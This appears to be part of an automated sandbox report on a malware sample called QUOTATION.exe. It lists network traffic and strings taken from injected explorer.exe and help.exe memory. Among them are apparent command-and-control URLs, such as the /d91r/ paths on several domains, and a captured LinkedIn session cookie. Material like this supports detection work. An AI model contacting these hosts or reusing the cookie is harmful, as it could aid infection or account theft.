Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:24:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:24:56 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:24:59 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:25:01 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: explorer.exe, 00000009.00000002.8041134967.000000001445C000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000003F1C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
Source: help.exe, 0000000A.00000002.7996001567.0000000003676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: help.exe, 0000000A.00000002.7996001567.0000000003695000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)

Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://23.83.160.2:88/tz.php?ref=
Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://batit.aliyun.com/alww.html
Source: explorer.exe, 00000009.00000002.8041134967.000000001562A000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.00000000050EA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://browsehappy.com/
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: QUOTATION.exe, 00000008.00000003.4190420029.000000000348F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.3934592654.0000000003492000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4189935994.000000000348E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: QUOTATION.exe, 00000008.00000003.4190420029.000000000348F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.3934592654.0000000003492000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000003.4189935994.000000000348E000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: explorer.exe, 00000009.00000003.6307208698.0000000010468000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4739275990.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8032051165.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6116549560.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4927766951.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4227133782.0000000010469000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: QUOTATION.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: QUOTATION.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000009.00000003.4743238865.000000000D45E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000D45E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6463260519.000000000D45E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6120364620.000000000D45E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8026780659.000000000D45E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6283225298.000000000D45E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 00000009.00000003.6307208698.0000000010468000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4739275990.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8032051165.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6116549560.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4927766951.0000000010469000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4227133782.0000000010469000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000009.00000000.4229381389.00000000106E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6308723662.00000000106E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4928720614.00000000106E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6293964967.00000000106E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6113969628.00000000106E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8033672168.00000000106E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6280975469.00000000106E7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000009.00000003.4739275990.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6309623031.0000000010710000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6461447970.0000000010710000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8033940684.0000000010713000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6293964967.0000000010710000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: QUOTATION.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: QUOTATION.exe	String found in binary or memory: http://s.symcd.com06
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://s2.symcb.com0
Source: explorer.exe, 00000009.00000002.8017544458.000000000B240000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.8000325790.00000000032D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.4214945056.000000000A840000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000009.00000002.8021127369.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.c
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://sv.symcd.com0&
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://trade.webnames.ru
Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: http://trade.webnames.ru/img/og_image.png
Source: QUOTATION.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: QUOTATION.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: QUOTATION.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.184411.com
Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.184411.com/d91r/
Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.184411.com/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.184411.comwww.b-tek.media
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aznqmd.com
Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aznqmd.com/d91r/
Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aznqmd.com/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aznqmd.comwww.
Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.aznqmd.comwww.texasgent.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b-tek.media
Source: explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b-tek.media/d91r/
Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b-tek.media/d91r/8H7gL=Bxcfm_qbbEGm
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b-tek.mediawww.dexmart.xyz
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.brightfms.com
Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.brightfms.com/d91r/
